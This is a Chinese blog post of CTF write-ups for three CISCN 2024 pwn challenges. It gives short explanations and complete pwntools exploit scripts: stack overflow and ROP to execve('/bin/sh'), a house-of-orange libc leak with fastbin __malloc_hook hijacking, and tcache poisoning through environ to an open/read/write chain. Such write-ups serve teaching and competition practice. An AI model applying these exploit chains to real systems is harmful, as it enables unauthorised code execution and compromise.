ciscn2024 初赛 pwn
里面的题目b站都有视频讲解,欢迎去我的b站账号观看
go stack
写法还是很多的,fun2就是后门,直接栈溢出过来就行,也可以syscall,唯一要注意的就是需要用\x00填充,绕过保护
fun2
from pwn import *
io=process('./pwn')
#io=remote('pwn.challenge.ctf.show',28118)
io.recv()
payload = b'\x00'*(0x1c8+8)+p64(0x4A0AF6)
io.sendline(payload)
io.interactive()syscall
from pwn import *
context(log_level = 'debug', arch = 'amd64', os = 'linux')
#io=process('./pwn')
io=remote('pwn.challenge.ctf.show',28118)
bss=0x563C52
syscall_ret=0x4616c9
pop_rdi_r14_r13_r12_rbp_rbx= 0x4a18a5
pop_rsi= 0x42138a
pop_rdx= 0x4944ec
pop_rax= 0x40f984
payload = b'\x00' * (0x1c8+8)
payload += p64(pop_rdi_r14_r13_r12_rbp_rbx) + p64(0)*6
payload += p64(pop_rsi) + p64(bss)
payload += p64(pop_rdx) + p64(8)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall_ret) #read(0,bss,8)
payload += p64(pop_rax) + p64(59)
payload += p64(pop_rdi_r14_r13_r12_rbp_rbx) + p64(bss) + p64(0) * 5
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall_ret) #exceve('bin/sh',0,0)
io.recv()
io.sendline(payload)
io.sendline(b'/bin/sh\x00')
io.interactive()orange_cat_diary
orange_cat_diary 利用house of orange可以泄露出libc,有一次free的机会,fastbin attack去劫持malloc hook就可以 了,改写为one_gadget,要注意的是最后一次申请堆块的时候,只能手动,add会报错 先申请一个任意大小的堆块,利用溢出,修改top_chunk的size位,满足页对齐之类的要求,然后再申 请一个大于top_chunk size的堆块,我这里用的就是0x1000,这样top_chunk就会被放进unsorted bin 里面,再申请一个位于unsored bin或者large bin的堆块,就可以不用free泄露libc了,2.23所以我选择 用fastbin attack,修改fd去劫持malloc_hook为onegadget,下次申请堆块就可以先执行shell,拿到权限
from pwn import *
context(log_level = 'debug', arch = 'amd64', os = 'linux')
#io=process('./pwn')
io=remote("pwn.challenge.ctf.show",28118)
elf=ELF('./pwn')
libc=ELF('libc-2.23.so')
io.recv()
io.sendline(b'aaaa')
def dbg():
gdb.attach(io)
pause()
def add(size,content):
io.recvuntil(b'Please input your choice:')
io.sendline(str(1))
io.recv()
io.sendline(str(size))
io.recv()
io.sendline(content)
def free():
io.recvuntil(b'Please input your choice:')
io.sendline(str(3))
def show():
io.recvuntil(b'Please input your choice:')
io.sendline(str(2))
def edit(size,content):
io.recvuntil(b'Please input your choice:')
io.sendline(str(4))
io.recvuntil(b'Please input the length of the diary content:')
io.sendline(str(size))
io.recvuntil(b'Please enter the diary content:')
io.sendline(content)
add(0x88,b'aaaa') #1
payload=b'a'*0x88+p64(0xf71)
edit(0x90,payload)
add(0x1000,b'aaaa')
add(0x400,b'aaaaaaaa')
show()
io.recvuntil(b'a'*8)
libc_base=u64(io.recvuntil(b'\x7f').ljust(8,b'\x00'))-0x3c510a
print(hex(libc_base))
malloc=libc_base+libc.sym['__malloc_hook']
one=libc_base+0xf03a4
print(hex(malloc))
add(0x60,b'aaaa')
free()
edit(0x10,p64(malloc-0x23))
add(0x60,b'aaaa')
add(0x60,b'a'*0x13+p64(one)) #malloc_hook-0x23
#dbg()
io.interactive()ezheap
2.35的堆题,打io或者environ都行,我这里用的是environ
from pwn import *
context(log_level = 'debug', arch = 'amd64', os = 'linux')
io=process('./pwn')
#io=remote("pwn.challenge.ctf.show",28193)
elf=ELF('./pwn')
libc=ELF('libc.so.6')
def dbg():
gdb.attach(io)
pause()
def bug():
gdb.attach(io,"b *$rebase(0x16cc)")
def add(size,content):
io.recvuntil(b'choice >>')
io.sendline(str(1))
io.recv()
io.sendline(str(size))
io.recv()
io.sendline(content)
def free(idx):
io.recvuntil(b'choice >>')
io.sendline(str(2))
io.recv()
io.sendline(str(idx))
def show(idx):
io.recvuntil(b'choice >>')
io.sendline(str(4))
io.recv()
io.sendline(str(idx))
def edit(idx,size,content):
io.recvuntil(b'choice >>')
io.sendline(str(3))
io.recv()
io.sendline(str(idx))
io.recv()
io.sendline(str(size))
io.recv()
io.sendline(content)
add(0x408,b'aaaa')#0
add(0x408,b'aaaa')#1
add(0x408,b'aaaa')#2
add(0x408,b'aaaa')#3
edit(0,0x500,b'a'*0x408+p64(0x821))
free(1)
add(0x408,b'a') #1
show(2)
io.recvuntil(b'content:')
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x21ace0
print(hex(libc_base))
add(0x408,b'aaaaaaaa')#4
add(0x408,b'aaaaaaaa')#5
add(0x408,b'aaaaaaaa')#6
free(4)
show(2)
io.recvuntil(b'content:')
heap_base=u64(io.recv(5).ljust(8,b'\x00'))<<12
print(hex(heap_base))
pop_rdi=libc_base+0x002a3e5
pop_rsi=libc_base+0x002be51
pop_rdx_rbx=libc_base+0x0904a9
pop_rax=libc_base+0x45eb0
syscall_ret=libc_base+0x0091316
environ = libc_base + libc.sym['environ']
heap=(heap_base+0x16e0)>>12
tar=environ-0x410
fd=heap^tar
free(6)
payload=b'a'*0x400+p64(0)+p64(0x411)+p64(fd)
edit(5,0x500,payload)
print(hex(tar))
add(0x400,b'aaaaaaaa')#4
add(0x400,b'aaaaaaaa')#6 tar_addr
edit(6,0x500,b'a'*0x40f)
show(6)
stack_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x168
print(hex(stack_addr))
orw = b'./flag\x00\x00'
orw += p64(pop_rdi) + p64(stack_addr - 0x10)
orw += p64(pop_rsi) + p64(0)
orw += p64(pop_rax) + p64(2)
orw += p64(syscall_ret) #open(./flag,0)
orw += p64(pop_rax) + p64(0)
orw += p64(pop_rdi) + p64(3)
orw += p64(pop_rsi) + p64(stack_addr - 0x300)
orw += p64(pop_rdx_rbx) + p64(0x30) * 2
orw += p64(syscall_ret) #read(3,stack_addr-0x300,0x30)
orw += p64(pop_rax) + p64(1)
orw += p64(pop_rdi) + p64(1)
orw += p64(pop_rsi) + p64(stack_addr - 0x300)
orw += p64(pop_rdx_rbx) + p64(0x30) * 2
orw += p64(syscall_ret) #write(1,stack-0x300,0x30)
add(0x408,b'aaaaaaaa')#7
add(0x408,b'aaaaaaaa')#8
add(0x408,b'aaaaaaaa')#9
add(0x408,b'aaaaaaaa')#10
free(9)
free(8)
heap=(heap_base+0x1f00)>>12
tar=stack_addr-0x10
fd=heap^tar
payload=b'a'*0x400+p64(0)+p64(0x411)+p64(fd)
edit(7,0x500,payload)
add(0x408,b'aaaaaaaa')#8
add(0x408,orw)#9
io.interactive()
文章有(3)条网友点评
太强啦!!!!
@ Cming 别骂别骂
愿你有前程可奔赴,亦有岁月可回首